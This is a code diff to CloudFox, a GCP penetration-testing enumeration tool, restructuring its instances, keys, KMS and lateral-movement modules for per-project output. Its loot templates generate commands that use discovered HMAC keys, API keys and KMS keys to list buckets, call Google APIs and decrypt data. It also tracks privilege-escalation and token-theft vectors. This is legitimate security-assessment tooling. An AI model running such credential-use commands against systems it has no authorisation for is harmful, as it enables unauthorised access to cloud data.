internal.HandleHierarchicalOutputSmart( + "gcp", + m.Format, + m.Verbosity, + m.WrapTable, + pathBuilder, + outputData, + ) + if err != nil { + logger.ErrorM(fmt.Sprintf("Error writing hierarchical output: %v", err), globals.GCP_INSTANCES_MODULE_NAME) + m.CommandCounter.Error++ + } +} + +// writeFlatOutput writes all output to a single directory (legacy mode) +func (m *InstancesModule) writeFlatOutput(ctx context.Context, logger internal.Logger) { + header := m.getInstancesTableHeader() + sshKeysHeader := m.getSSHKeysTableHeader() + + allInstances := m.getAllInstances() + body := m.instancesToTableBody(allInstances) + + // Build SSH keys table for all projects + var sshKeysBody [][]string + for projectID, instances := range m.ProjectInstances { + sshKeysBody = append(sshKeysBody, m.buildSSHKeysTableForProject(projectID, instances)...) + } + + // Collect all loot files + var lootFiles []internal.LootFile + for _, projectLoot := range m.LootMap { + for _, loot := range projectLoot { + if loot != nil && loot.Contents != "" && !strings.HasSuffix(loot.Contents, "# WARNING: Only use with proper authorization\n\n") { + lootFiles = append(lootFiles, *loot) + } + } + } + + // Build table files + tableFiles := []internal.TableFile{{ + Name: globals.GCP_INSTANCES_MODULE_NAME, + Header: header, + Body: body, + }} + + // Add SSH keys table if there are any + if len(sshKeysBody) > 0 { + tableFiles = append(tableFiles, internal.TableFile{ + Name: "instances-ssh-keys", + Header: sshKeysHeader, + Body: sshKeysBody, + }) + } + + output := InstancesOutput{ + Table: tableFiles, + Loot: lootFiles, + } + + // Write output using HandleOutputSmart with scope support + scopeNames := make([]string, len(m.ProjectIDs)) + for i, id := range m.ProjectIDs { + scopeNames[i] = m.GetProjectName(id) + } + err := internal.HandleOutputSmart( + "gcp", + m.Format, + m.OutputDirectory, + m.Verbosity, + m.WrapTable, + "project", // scopeType + m.ProjectIDs, // scopeIdentifiers + scopeNames, // scopeNames + m.Account, + output, + ) + if err != nil { + logger.ErrorM(fmt.Sprintf("Error writing output: %v", err), globals.GCP_INSTANCES_MODULE_NAME) + m.CommandCounter.Error++ + } +} + +// getInstancesTableHeader returns the instances table header +func (m *InstancesModule) getInstancesTableHeader() []string { + return []string{ "Project Name", "Project ID", "Name", @@ -392,6 +552,7 @@ func (m *InstancesModule) writeOutput(ctx context.Context, logger internal.Logge "External IP", "Internal IP", "Service Account", + "Priv Esc", "Scopes", "Default SA", "Broad Scopes", @@ -407,12 +568,28 @@ func (m *InstancesModule) writeOutput(ctx context.Context, logger internal.Logge "Confidential", "Encryption", "KMS Key", - "IAM Role", - "IAM Member", + "Resource Role", + "Resource Principal", + } +} + +// getSSHKeysTableHeader returns the SSH keys table header +func (m *InstancesModule) getSSHKeysTableHeader() []string { + return []string{ + "Project Name", + "Project ID", + "Source", + "Zone", + "Username", + "Key Type", + "Key (truncated)", } +} +// instancesToTableBody converts instances to table body rows +func (m *InstancesModule) instancesToTableBody(instances []ComputeEngineService.ComputeEngineInfo) [][]string { var body [][]string - for _, instance := range m.Instances { + for _, instance := range instances { // Get first service account email (most instances have just one) saEmail := "-" scopes := "-" @@ -421,6 +598,16 @@ func (m *InstancesModule) writeOutput(ctx context.Context, logger internal.Logge scopes = ComputeEngineService.FormatScopes(instance.ServiceAccounts[0].Scopes) } + // Check privesc for the service account + privEsc := "-" + if m.PrivescCache != nil && m.PrivescCache.IsPopulated() { + if saEmail != "-" { + privEsc = m.PrivescCache.GetPrivescSummary(saEmail) + } else { + privEsc = "No" + } + } + // External IP display externalIP := instance.ExternalIP if externalIP == "" { @@ -450,6 +637,7 @@ func (m *InstancesModule) writeOutput(ctx context.Context, logger internal.Logge externalIP, instance.InternalIP, saEmail, + privEsc, scopes, boolToYesNo(instance.HasDefaultSA), boolToYesNo(instance.HasCloudScopes), @@ -485,40 +673,31 @@ func (m *InstancesModule) writeOutput(ctx context.Context, logger internal.Logge body = append(body, row) } } + return body +} - // SSH keys table (pentest-focused - keep separate) - sshKeysHeader := []string{ - "Project Name", - "Project ID", - "Source", - "Zone", - "Username", - "Key Type", - "Key (truncated)", - } - +// buildSSHKeysTableForProject builds the SSH keys table body for a specific project +func (m *InstancesModule) buildSSHKeysTableForProject(projectID string, instances []ComputeEngineService.ComputeEngineInfo) [][]string { var sshKeysBody [][]string // Add project-level SSH keys - for projectID, meta := range m.ProjectMetadata { - if meta != nil && len(meta.ProjectSSHKeys) > 0 { - for _, key := range meta.ProjectSSHKeys { - parts := parseSSHKeyLine(key) - sshKeysBody = append(sshKeysBody, []string{ - m.GetProjectName(projectID), - projectID, - "PROJECT", - "-", - parts.Username, - parts.KeyType, - parts.KeyTruncated, - }) - } + if meta, ok := m.ProjectMetadata[projectID]; ok && meta != nil && len(meta.ProjectSSHKeys) > 0 { + for _, key := range meta.ProjectSSHKeys { + parts := parseSSHKeyLine(key) + sshKeysBody = append(sshKeysBody, []string{ + m.GetProjectName(projectID), + projectID, + "PROJECT", + "-", + parts.Username, + parts.KeyType, + parts.KeyTruncated, + }) } } // Add instance-level SSH keys - for _, instance := range m.Instances { + for _, instance := range instances { if len(instance.SSHKeys) > 0 { for _, key := range instance.SSHKeys { parts := parseSSHKeyLine(key) @@ -535,56 +714,5 @@ func (m *InstancesModule) writeOutput(ctx context.Context, logger internal.Logge } } - // Collect loot files (only if content was added beyond header) - var lootFiles []internal.LootFile - for _, loot := range m.LootMap { - if loot.Contents != "" && !strings.HasSuffix(loot.Contents, "# WARNING: Only use with proper authorization\n\n") { - lootFiles = append(lootFiles, *loot) - } - } - - // Build table files - tableFiles := []internal.TableFile{ - { - Name: globals.GCP_INSTANCES_MODULE_NAME, - Header: header, - Body: body, - }, - } - - // Add SSH keys table if there are any - if len(sshKeysBody) > 0 { - tableFiles = append(tableFiles, internal.TableFile{ - Name: "instances-ssh-keys", - Header: sshKeysHeader, - Body: sshKeysBody, - }) - } - - output := InstancesOutput{ - Table: tableFiles, - Loot: lootFiles, - } - - // Write output using HandleOutputSmart with scope support - scopeNames := make([]string, len(m.ProjectIDs)) - for i, id := range m.ProjectIDs { - scopeNames[i] = m.GetProjectName(id) - } - err := internal.HandleOutputSmart( - "gcp", - m.Format, - m.OutputDirectory, - m.Verbosity, - m.WrapTable, - "project", // scopeType - m.ProjectIDs, // scopeIdentifiers - scopeNames, // scopeNames - m.Account, - output, - ) - if err != nil { - logger.ErrorM(fmt.Sprintf("Error writing output: %v", err), globals.GCP_INSTANCES_MODULE_NAME) - m.CommandCounter.Error++ - } + return sshKeysBody } diff --git a/gcp/commands/keys.go b/gcp/commands/keys.go index 4ae10519..be62a79b 100644 --- a/gcp/commands/keys.go +++ b/gcp/commands/keys.go @@ -55,9 +55,9 @@ type UnifiedKeyInfo struct { type KeysModule struct { gcpinternal.BaseGCPModule - Keys []UnifiedKeyInfo - LootMap map[string]*internal.LootFile - mu sync.Mutex + ProjectKeys map[string][]UnifiedKeyInfo // projectID -> keys + LootMap map[string]map[string]*internal.LootFile // projectID -> loot files + mu sync.Mutex } type KeysOutput struct { @@ -76,17 +76,17 @@ func runGCPKeysCommand(cmd *cobra.Command, args []string) { module := &KeysModule{ BaseGCPModule: gcpinternal.NewBaseGCPModule(cmdCtx), - Keys: []UnifiedKeyInfo{}, - LootMap: make(map[string]*internal.LootFile), + ProjectKeys: make(map[string][]UnifiedKeyInfo), + LootMap: make(map[string]map[string]*internal.LootFile), } - module.initializeLootFiles() module.Execute(cmdCtx.Ctx, cmdCtx.Logger) } func (m *KeysModule) Execute(ctx context.Context, logger internal.Logger) { m.RunProjectEnumeration(ctx, logger, m.ProjectIDs, globals.GCP_KEYS_MODULE_NAME, m.processProject) - if len(m.Keys) == 0 { + allKeys := m.getAllKeys() + if len(allKeys) == 0 { logger.InfoM("No keys found", globals.GCP_KEYS_MODULE_NAME) return } @@ -97,7 +97,7 @@ func (m *KeysModule) Execute(ctx context.Context, logger internal.Logger) { apiKeyCount := 0 userManagedCount := 0 - for _, key := range m.Keys { + for _, key := range allKeys { switch key.KeyType { case "SA Key": saKeyCount++ @@ -112,11 +112,20 @@ func (m *KeysModule) Execute(ctx context.Context, logger internal.Logger) { } logger.SuccessM(fmt.Sprintf("Found %d key(s) (%d SA keys [%d user-managed], %d HMAC keys, %d API keys)", - len(m.Keys), saKeyCount, userManagedCount, hmacKeyCount, apiKeyCount), globals.GCP_KEYS_MODULE_NAME) + len(allKeys), saKeyCount, userManagedCount, hmacKeyCount, apiKeyCount), globals.GCP_KEYS_MODULE_NAME) m.writeOutput(ctx, logger) } +// getAllKeys returns all keys from all projects +func (m *KeysModule) getAllKeys() []UnifiedKeyInfo { + var all []UnifiedKeyInfo + for _, keys := range m.ProjectKeys { + all = append(all, keys...) + } + return all +} + func (m *KeysModule) processProject(ctx context.Context, projectID string, logger internal.Logger) { if globals.GCP_VERBOSITY >= globals.GCP_VERBOSE_ERRORS { logger.InfoM(fmt.Sprintf("Enumerating keys in project: %s", projectID), globals.GCP_KEYS_MODULE_NAME) @@ -245,68 +254,86 @@ func (m *KeysModule) processProject(ctx context.Context, projectID string, logge } } - // Thread-safe append + // Thread-safe store per-project m.mu.Lock() - m.Keys = append(m.Keys, projectKeys...) - for _, key := range projectKeys { - m.addKeyToLoot(key) + m.ProjectKeys[projectID] = projectKeys + + // Initialize loot for this project + if m.LootMap[projectID] == nil { + m.LootMap[projectID] = make(map[string]*internal.LootFile) + m.LootMap[projectID]["keys-hmac-s3-commands"] = &internal.LootFile{ + Name: "keys-hmac-s3-commands", + Contents: "# HMAC S3-Compatible Access Commands\n# Generated by CloudFox\n# WARNING: Only use with proper authorization\n\n", + } + m.LootMap[projectID]["keys-apikey-test-commands"] = &internal.LootFile{ + Name: "keys-apikey-test-commands", + Contents: "# API Key Test Commands\n# Generated by CloudFox\n# WARNING: Only use with proper authorization\n\n", + } } - m.mu.Unlock() -} -func (m *KeysModule) initializeLootFiles() { - m.LootMap["keys-hmac-s3-commands"] = &internal.LootFile{ - Name: "keys-hmac-s3-commands", - Contents: "# HMAC S3-Compatible Access Commands\n# Generated by CloudFox\n# WARNING: Only use with proper authorization\n\n", - } - m.LootMap["keys-apikey-test-commands"] = &internal.LootFile{ - Name: "keys-apikey-test-commands", - Contents: "# API Key Test Commands\n# Generated by CloudFox\n# WARNING: Only use with proper authorization\n\n", + for _, key := range projectKeys { + m.addKeyToLoot(projectID, key) } + m.mu.Unlock() } -func (m *KeysModule) addKeyToLoot(key UnifiedKeyInfo) { +func (m *KeysModule) addKeyToLoot(projectID string, key UnifiedKeyInfo) { switch key.KeyType { case "HMAC": if key.State == "ACTIVE" { - m.LootMap["keys-hmac-s3-commands"].Contents += fmt.Sprintf( - "# HMAC Key: %s\n"+ - "# Service Account: %s\n"+ - "# Project: %s\n\n"+ - "# Configure AWS CLI with HMAC credentials:\n"+ - "aws configure set aws_access_key_id %s\n"+ - "aws configure set aws_secret_access_key \n\n"+ - "# List buckets via S3-compatible endpoint:\n"+ - "aws --endpoint-url https://storage.googleapis.com s3 ls\n\n", - key.KeyID, - key.Owner, - key.ProjectID, - key.KeyID, - ) + lootFile := m.LootMap[projectID]["keys-hmac-s3-commands"] + if lootFile != nil { + lootFile.Contents += fmt.Sprintf( + "# HMAC Key: %s\n"+ + "# Service Account: %s\n"+ + "# Project: %s\n\n"+ + "# Configure AWS CLI with HMAC credentials:\n"+ + "aws configure set aws_access_key_id %s\n"+ + "aws configure set aws_secret_access_key \n\n"+ + "# List buckets via S3-compatible endpoint:\n"+ + "aws --endpoint-url https://storage.googleapis.com s3 ls\n\n", + key.KeyID, + key.Owner, + key.ProjectID, + key.KeyID, + ) + } } case "API Key": if key.KeyString != "" { - m.LootMap["keys-apikey-test-commands"].Contents += fmt.Sprintf( - "# API Key: %s (%s)\n"+ - "# Project: %s\n"+ - "# Restrictions: %s\n\n"+ - "# Test API access:\n"+ - "curl -H 'X-Goog-Api-Key: %s' 'https://maps.googleapis.com/maps/api/geocode/json?address=test'\n"+ - "curl -H 'X-Goog-Api-Key: %s' 'https://translation.googleapis.com/language/translate/v2?q=Hello&target=es'\n\n", - key.KeyID, - key.DisplayName, - key.ProjectID, - key.Restrictions, - key.KeyString, - key.KeyString, - ) + lootFile := m.LootMap[projectID]["keys-apikey-test-commands"] + if lootFile != nil { + lootFile.Contents += fmt.Sprintf( + "# API Key: %s (%s)\n"+ + "# Project: %s\n"+ + "# Restrictions: %s\n\n"+ + "# Test API access:\n"+ + "curl -H 'X-Goog-Api-Key: %s' 'https://maps.googleapis.com/maps/api/geocode/json?address=test'\n"+ + "curl -H 'X-Goog-Api-Key: %s' 'https://translation.googleapis.com/language/translate/v2?q=Hello&target=es'\n\n", + key.KeyID, + key.DisplayName, + key.ProjectID, + key.Restrictions, + key.KeyString, + key.KeyString, + ) + } } } } func (m *KeysModule) writeOutput(ctx context.Context, logger internal.Logger) { - header := []string{ + if m.Hierarchy != nil && !m.FlatOutput { + m.writeHierarchicalOutput(ctx, logger) + } else { + m.writeFlatOutput(ctx, logger) + } +} + +// getTableHeader returns the header for the keys table +func (m *KeysModule) getTableHeader() []string { + return []string{ "Project ID", "Project Name", "Key Type", @@ -320,9 +347,12 @@ func (m *KeysModule) writeOutput(ctx context.Context, logger internal.Logger) { "DWD", "Restrictions", } +} +// keysToTableBody converts keys to table body rows +func (m *KeysModule) keysToTableBody(keys []UnifiedKeyInfo) [][]string { var body [][]string - for _, key := range m.Keys { + for _, key := range keys { created := "-" if !key.CreateTime.IsZero() { created = key.CreateTime.Format("2006-01-02") @@ -372,23 +402,74 @@ func (m *KeysModule) writeOutput(ctx context.Context, logger internal.Logger) { restrictions, }) } + return body +} - // Collect loot files - var lootFiles []internal.LootFile - for _, loot := range m.LootMap { - if loot.Contents != "" && !strings.HasSuffix(loot.Contents, "# Generated by CloudFox\n\n") { - lootFiles = append(lootFiles, *loot) - } +// writeHierarchicalOutput writes output to per-project directories +func (m *KeysModule) writeHierarchicalOutput(ctx context.Context, logger internal.Logger) { + outputData := internal.HierarchicalOutputData{ + OrgLevelData: make(map[string]internal.CloudfoxOutput), + ProjectLevelData: make(map[string]internal.CloudfoxOutput), } - tables := []internal.TableFile{ - { + for projectID, keys := range m.ProjectKeys { + body := m.keysToTableBody(keys) + tableFiles := []internal.TableFile{{ Name: "keys", - Header: header, + Header: m.getTableHeader(), Body: body, - }, + }} + + // Collect loot for this project + var lootFiles []internal.LootFile + if projectLoot, ok := m.LootMap[projectID]; ok { + for _, loot := range projectLoot { + if loot != nil && loot.Contents != "" && !strings.HasSuffix(loot.Contents, "# WARNING: Only use with proper authorization\n\n") { + lootFiles = append(lootFiles, *loot) + } + } + } + + outputData.ProjectLevelData[projectID] = KeysOutput{Table: tableFiles, Loot: lootFiles} } + pathBuilder := m.BuildPathBuilder() + + err := internal.HandleHierarchicalOutputSmart( + "gcp", + m.Format, + m.Verbosity, + m.WrapTable, + pathBuilder, + outputData, + ) + if err != nil { + logger.ErrorM(fmt.Sprintf("Error writing hierarchical output: %v", err), globals.GCP_KEYS_MODULE_NAME) + m.CommandCounter.Error++ + } +} + +// writeFlatOutput writes all output to a single directory (legacy mode) +func (m *KeysModule) writeFlatOutput(ctx context.Context, logger internal.Logger) { + allKeys := m.getAllKeys() + body := m.keysToTableBody(allKeys) + + // Collect all loot files + var lootFiles []internal.LootFile + for _, projectLoot := range m.LootMap { + for _, loot := range projectLoot { + if loot != nil && loot.Contents != "" && !strings.HasSuffix(loot.Contents, "# WARNING: Only use with proper authorization\n\n") { + lootFiles = append(lootFiles, *loot) + } + } + } + + tables := []internal.TableFile{{ + Name: "keys", + Header: m.getTableHeader(), + Body: body, + }} + output := KeysOutput{Table: tables, Loot: lootFiles} scopeNames := make([]string, len(m.ProjectIDs)) diff --git a/gcp/commands/kms.go b/gcp/commands/kms.go index 3590f14c..d2354307 100644 --- a/gcp/commands/kms.go +++ b/gcp/commands/kms.go @@ -33,6 +33,10 @@ Security Columns: - Rotation: Key rotation period and next rotation time - PublicDecrypt: Whether allUsers/allAuthenticatedUsers can decrypt +Resource IAM Columns: +- Resource Role: The IAM role granted ON this key (e.g., roles/cloudkms.cryptoKeyDecrypter) +- Resource Principal: The principal (user/SA/group) who has that role on this key + Attack Surface: - Public decrypt access allows unauthorized data access - Keys without rotation may be compromised long-term @@ -47,10 +51,11 @@ Attack Surface: type KMSModule struct { gcpinternal.BaseGCPModule - KeyRings []KMSService.KeyRingInfo - CryptoKeys []KMSService.CryptoKeyInfo - LootMap map[string]*internal.LootFile - mu sync.Mutex + // Per-project data for hierarchical output + ProjectKeyRings map[string][]KMSService.KeyRingInfo + ProjectCryptoKeys map[string][]KMSService.CryptoKeyInfo + LootMap map[string]map[string]*internal.LootFile + mu sync.Mutex } // ------------------------------ @@ -74,13 +79,12 @@ func runGCPKMSCommand(cmd *cobra.Command, args []string) { } module := &KMSModule{ - BaseGCPModule: gcpinternal.NewBaseGCPModule(cmdCtx), - KeyRings: []KMSService.KeyRingInfo{}, - CryptoKeys: []KMSService.CryptoKeyInfo{}, - LootMap: make(map[string]*internal.LootFile), + BaseGCPModule: gcpinternal.NewBaseGCPModule(cmdCtx), + ProjectKeyRings: make(map[string][]KMSService.KeyRingInfo), + ProjectCryptoKeys: make(map[string][]KMSService.CryptoKeyInfo), + LootMap: make(map[string]map[string]*internal.LootFile), } - module.initializeLootFiles() module.Execute(cmdCtx.Ctx, cmdCtx.Logger) } @@ -90,7 +94,11 @@ func runGCPKMSCommand(cmd *cobra.Command, args []string) { func (m *KMSModule) Execute(ctx context.Context, logger internal.Logger) { m.RunProjectEnumeration(ctx, logger, m.ProjectIDs, globals.GCP_KMS_MODULE_NAME, m.processProject) - if len(m.CryptoKeys) == 0 { + // Get all data for stats + allKeyRings := m.getAllKeyRings() + allCryptoKeys := m.getAllCryptoKeys() + + if len(allCryptoKeys) == 0 { logger.InfoM("No KMS keys found", globals.GCP_KMS_MODULE_NAME) return } @@ -98,20 +106,16 @@ func (m *KMSModule) Execute(ctx context.Context, logger internal.Logger) { // Count security-relevant metrics hsmCount := 0 publicDecryptCount := 0 - noRotationCount := 0 - for _, key := range m.CryptoKeys { + for _, key := range allCryptoKeys { if key.ProtectionLevel == "HSM" { hsmCount++ } if key.IsPublicDecrypt { publicDecryptCount++ } - if key.RotationPeriod == "" && key.Purpose == "ENCRYPT_DECRYPT" { - noRotationCount++ - } } - msg := fmt.Sprintf("Found %d key ring(s), %d key(s)", len(m.KeyRings), len(m.CryptoKeys)) + msg := fmt.Sprintf("Found %d key ring(s), %d key(s)", len(allKeyRings), len(allCryptoKeys)) if hsmCount > 0 { msg += fmt.Sprintf(" [%d HSM]", hsmCount) } @@ -123,6 +127,24 @@ func (m *KMSModule) Execute(ctx context.Context, logger internal.Logger) { m.writeOutput(ctx, logger) } +// getAllKeyRings returns all key rings from all projects +func (m *KMSModule) getAllKeyRings() []KMSService.KeyRingInfo { + var all []KMSService.KeyRingInfo + for _, keyRings := range m.ProjectKeyRings { + all = append(all, keyRings...) + } + return all +} + +// getAllCryptoKeys returns all crypto keys from all projects +func (m *KMSModule) getAllCryptoKeys() []KMSService.CryptoKeyInfo { + var all []KMSService.CryptoKeyInfo + for _, keys := range m.ProjectCryptoKeys { + all = append(all, keys...) + } + return all +} + // ------------------------------ // Project Processor // ------------------------------ @@ -133,6 +155,17 @@ func (m *KMSModule) processProject(ctx context.Context, projectID string, logger ks := KMSService.New() + // Initialize loot for this project + m.mu.Lock() + if m.LootMap[projectID] == nil { + m.LootMap[projectID] = make(map[string]*internal.LootFile) + m.LootMap[projectID]["kms-commands"] = &internal.LootFile{ + Name: "kms-commands", + Contents: "# KMS Commands\n# Generated by CloudFox\n# WARNING: Only use with proper authorization\n\n", + } + } + m.mu.Unlock() + // Get key rings keyRings, err := ks.KeyRings(projectID) if err != nil { @@ -142,25 +175,24 @@ func (m *KMSModule) processProject(ctx context.Context, projectID string, logger return } - m.mu.Lock() - m.KeyRings = append(m.KeyRings, keyRings...) - m.mu.Unlock() - // Get crypto keys keys, err := ks.CryptoKeys(projectID) if err != nil { m.CommandCounter.Error++ gcpinternal.HandleGCPError(err, logger, globals.GCP_KMS_MODULE_NAME, fmt.Sprintf("Could not enumerate KMS keys in project %s", projectID)) - } else { - m.mu.Lock() - m.CryptoKeys = append(m.CryptoKeys, keys...) - for _, key := range keys { - m.addKeyToLoot(key) - } - m.mu.Unlock() } + // Thread-safe store per-project + m.mu.Lock() + m.ProjectKeyRings[projectID] = keyRings + m.ProjectCryptoKeys[projectID] = keys + + for _, key := range keys { + m.addKeyToLoot(projectID, key) + } + m.mu.Unlock() + if globals.GCP_VERBOSITY >= globals.GCP_VERBOSE_ERRORS { logger.InfoM(fmt.Sprintf("Found %d key ring(s), %d key(s) in project %s", len(keyRings), len(keys), projectID), globals.GCP_KMS_MODULE_NAME) } @@ -169,15 +201,13 @@ func (m *KMSModule) processProject(ctx context.Context, projectID string, logger // ------------------------------ // Loot File Management // ------------------------------ -func (m *KMSModule) initializeLootFiles() { - m.LootMap["kms-commands"] = &internal.LootFile{ - Name: "kms-commands", - Contents: "# KMS Commands\n# Generated by CloudFox\n# WARNING: Only use with proper authorization\n\n", +func (m *KMSModule) addKeyToLoot(projectID string, key KMSService.CryptoKeyInfo) { + lootFile := m.LootMap[projectID]["kms-commands"] + if lootFile == nil { + return } -} -func (m *KMSModule) addKeyToLoot(key KMSService.CryptoKeyInfo) { - m.LootMap["kms-commands"].Contents += fmt.Sprintf( + lootFile.Contents += fmt.Sprintf( "## Key: %s (Project: %s, KeyRing: %s, Location: %s)\n"+ "# Purpose: %s, Protection: %s\n", key.Name, key.ProjectID, @@ -186,7 +216,7 @@ func (m *KMSModule) addKeyToLoot(key KMSService.CryptoKeyInfo) { ) // Commands - m.LootMap["kms-commands"].Contents += fmt.Sprintf( + lootFile.Contents += fmt.Sprintf( "\n# Describe key:\n"+ "gcloud kms keys describe %s --keyring=%s --location=%s --project=%s\n"+ "# Get IAM policy:\n"+ @@ -201,7 +231,7 @@ func (m *KMSModule) addKeyToLoot(key KMSService.CryptoKeyInfo) { // Purpose-specific commands switch key.Purpose { case "ENCRYPT_DECRYPT": - m.LootMap["kms-commands"].Contents += fmt.Sprintf( + lootFile.Contents += fmt.Sprintf( "# Encrypt data:\n"+ "echo -n 'secret data' | gcloud kms encrypt --key=%s --keyring=%s --location=%s --project=%s --plaintext-file=- --ciphertext-file=encrypted.bin\n"+ "# Decrypt data:\n"+ @@ -210,7 +240,7 @@ func (m *KMSModule) addKeyToLoot(key KMSService.CryptoKeyInfo) { key.Name, key.KeyRing, key.Location, key.ProjectID, ) case "ASYMMETRIC_SIGN": - m.LootMap["kms-commands"].Contents += fmt.Sprintf( + lootFile.Contents += fmt.Sprintf( "# Sign data:\n"+ "gcloud kms asymmetric-sign --key=%s --keyring=%s --location=%s --project=%s --version=1 --digest-algorithm=sha256 --input-file=data.txt --signature-file=signature.bin\n"+ "# Get public key:\n"+ @@ -219,7 +249,7 @@ func (m *KMSModule) addKeyToLoot(key KMSService.CryptoKeyInfo) { key.Name, key.KeyRing, key.Location, key.ProjectID, ) case "ASYMMETRIC_DECRYPT": - m.LootMap["kms-commands"].Contents += fmt.Sprintf( + lootFile.Contents += fmt.Sprintf( "# Decrypt data:\n"+ "gcloud kms asymmetric-decrypt --key=%s --keyring=%s --location=%s --project=%s --version=1 --ciphertext-file=encrypted.bin --plaintext-file=-\n"+ "# Get public key:\n"+ @@ -229,15 +259,23 @@ func (m *KMSModule) addKeyToLoot(key KMSService.CryptoKeyInfo) { ) } - m.LootMap["kms-commands"].Contents += "\n" + lootFile.Contents += "\n" } // ------------------------------ // Output Generation // ------------------------------ func (m *KMSModule) writeOutput(ctx context.Context, logger internal.Logger) { - // Crypto keys table with IAM columns - one row per IAM binding - keysHeader := []string{ + if m.Hierarchy != nil && !m.FlatOutput { + m.writeHierarchicalOutput(ctx, logger) + } else { + m.writeFlatOutput(ctx, logger) + } +} + +// getKeysHeader returns the header for the crypto keys table +func (m *KMSModule) getKeysHeader() []string { + return []string{ "Project Name", "Project ID", "Key Name", @@ -250,12 +288,26 @@ func (m *KMSModule) writeOutput(ctx context.Context, logger internal.Logger) { "Rotation", "Public Encrypt", "Public Decrypt", - "IAM Role", - "IAM Member", + "Resource Role", + "Resource Principal", } +} - var keysBody [][]string - for _, key := range m.CryptoKeys { +// getKeyRingsHeader returns the header for the key rings table +func (m *KMSModule) getKeyRingsHeader() []string { + return []string{ + "Project Name", + "Project ID", + "Key Ring", + "Location", + "Key Count", + } +} + +// keysToTableBody converts crypto keys to table body rows +func (m *KMSModule) keysToTableBody(keys []KMSService.CryptoKeyInfo) [][]string { + var body [][]string + for _, key := range keys { // Format rotation rotation := "-" if key.RotationPeriod != "" { @@ -291,7 +343,7 @@ func (m *KMSModule) writeOutput(ctx context.Context, logger internal.Logger) { copy(row, baseRow) row[len(baseRow)] = binding.Role row[len(baseRow)+1] = binding.Member - keysBody = append(keysBody, row) + body = append(body, row) } } else { // No IAM bindings - single row @@ -299,22 +351,17 @@ func (m *KMSModule) writeOutput(ctx context.Context, logger internal.Logger) { copy(row, baseRow) row[len(baseRow)] = "-" row[len(baseRow)+1] = "-" - keysBody = append(keysBody, row) + body = append(body, row) } } + return body +} - // Key rings table (summary) - keyRingsHeader := []string{ - "Project Name", - "Project ID", - "Key Ring", - "Location", - "Key Count", - } - - var keyRingsBody [][]string - for _, kr := range m.KeyRings { - keyRingsBody = append(keyRingsBody, []string{ +// keyRingsToTableBody converts key rings to table body rows +func (m *KMSModule) keyRingsToTableBody(keyRings []KMSService.KeyRingInfo) [][]string { + var body [][]string + for _, kr := range keyRings { + body = append(body, []string{ m.GetProjectName(kr.ProjectID), kr.ProjectID, kr.Name, @@ -322,30 +369,114 @@ func (m *KMSModule) writeOutput(ctx context.Context, logger internal.Logger) { fmt.Sprintf("%d", kr.KeyCount), }) } + return body +} + +// buildTablesForProject builds table files for a single project +func (m *KMSModule) buildTablesForProject(projectID string) []internal.TableFile { + keys := m.ProjectCryptoKeys[projectID] + keyRings := m.ProjectKeyRings[projectID] + + keysBody := m.keysToTableBody(keys) + keyRingsBody := m.keyRingsToTableBody(keyRings) + + var tableFiles []internal.TableFile + if len(keysBody) > 0 { + tableFiles = append(tableFiles, internal.TableFile{ + Name: globals.GCP_KMS_MODULE_NAME + "-keys", + Header: m.getKeysHeader(), + Body: keysBody, + }) + } + if len(keyRingsBody) > 0 { + tableFiles = append(tableFiles, internal.TableFile{ + Name: globals.GCP_KMS_MODULE_NAME + "-keyrings", + Header: m.getKeyRingsHeader(), + Body: keyRingsBody, + }) + } + return tableFiles +} + +// writeHierarchicalOutput writes output to per-project directories +func (m *KMSModule) writeHierarchicalOutput(ctx context.Context, logger internal.Logger) { + outputData := internal.HierarchicalOutputData{ + OrgLevelData: make(map[string]internal.CloudfoxOutput), + ProjectLevelData: make(map[string]internal.CloudfoxOutput), + } + + // Collect all projects with data + projectsWithData := make(map[string]bool) + for projectID := range m.ProjectCryptoKeys { + projectsWithData[projectID] = true + } + for projectID := range m.ProjectKeyRings { + projectsWithData[projectID] = true + } - // Collect loot files + for projectID := range projectsWithData { + tableFiles := m.buildTablesForProject(projectID) + + // Collect loot for this project + var lootFiles []internal.LootFile + if projectLoot, ok := m.LootMap[projectID]; ok { + for _, loot := range projectLoot { + if loot != nil && loot.Contents != "" && !strings.HasSuffix(loot.Contents, "# WARNING: Only use with proper authorization\n\n") { + lootFiles = append(lootFiles, *loot) + } + } + } + + outputData.ProjectLevelData[projectID] = KMSOutput{Table: tableFiles, Loot: lootFiles} + } + + pathBuilder := m.BuildPathBuilder() + + err := internal.HandleHierarchicalOutputSmart( + "gcp", + m.Format, + m.Verbosity, + m.WrapTable, + pathBuilder, + outputData, + ) + if err != nil { + logger.ErrorM(fmt.Sprintf("Error writing hierarchical output: %v", err), globals.GCP_KMS_MODULE_NAME) + m.CommandCounter.Error++ + } +} + +// writeFlatOutput writes all output to a single directory (legacy mode) +func (m *KMSModule) writeFlatOutput(ctx context.Context, logger internal.Logger) { + allKeys := m.getAllCryptoKeys() + allKeyRings := m.getAllKeyRings() + + keysBody := m.keysToTableBody(allKeys) + keyRingsBody := m.keyRingsToTableBody(allKeyRings) + + // Collect all loot files var lootFiles []internal.LootFile - for _, loot := range m.LootMap { - if loot.Contents != "" && !strings.HasSuffix(loot.Contents, "# WARNING: Only use with proper authorization\n\n") { - lootFiles = append(lootFiles, *loot) + for _, projectLoot := range m.LootMap { + for _, loot := range projectLoot { + if loot != nil && loot.Contents != "" && !strings.HasSuffix(loot.Contents, "# WARNING: Only use with proper authorization\n\n") { + lootFiles = append(lootFiles, *loot) + } } } // Build table files - tableFiles := []internal.TableFile{} - + var tableFiles []internal.TableFile if len(keysBody) > 0 { tableFiles = append(tableFiles, internal.TableFile{ Name: globals.GCP_KMS_MODULE_NAME + "-keys", - Header: keysHeader, + Header: m.getKeysHeader(), Body: keysBody, }) } - if len(keyRingsBody) > 0 { tableFiles = append(tableFiles, internal.TableFile{ Name: globals.GCP_KMS_MODULE_NAME + "-keyrings", - Header: keyRingsHeader, + Header: m.getKeyRingsHeader(), Body: keyRingsBody, }) } diff --git a/gcp/commands/lateralmovement.go b/gcp/commands/lateralmovement.go index 53470e9e..59af2e1e 100644 --- a/gcp/commands/lateralmovement.go +++ b/gcp/commands/lateralmovement.go @@ -69,10 +69,10 @@ type TokenTheftVector struct { type LateralMovementModule struct { gcpinternal.BaseGCPModule - ImpersonationChains []ImpersonationChain - TokenTheftVectors []TokenTheftVector - LootMap map[string]*internal.LootFile - mu sync.Mutex + ProjectImpersonationChains map[string][]ImpersonationChain // projectID -> chains + ProjectTokenTheftVectors map[string][]TokenTheftVector // projectID -> vectors + LootMap map[string]map[string]*internal.LootFile // projectID -> loot files + mu sync.Mutex } // ------------------------------ 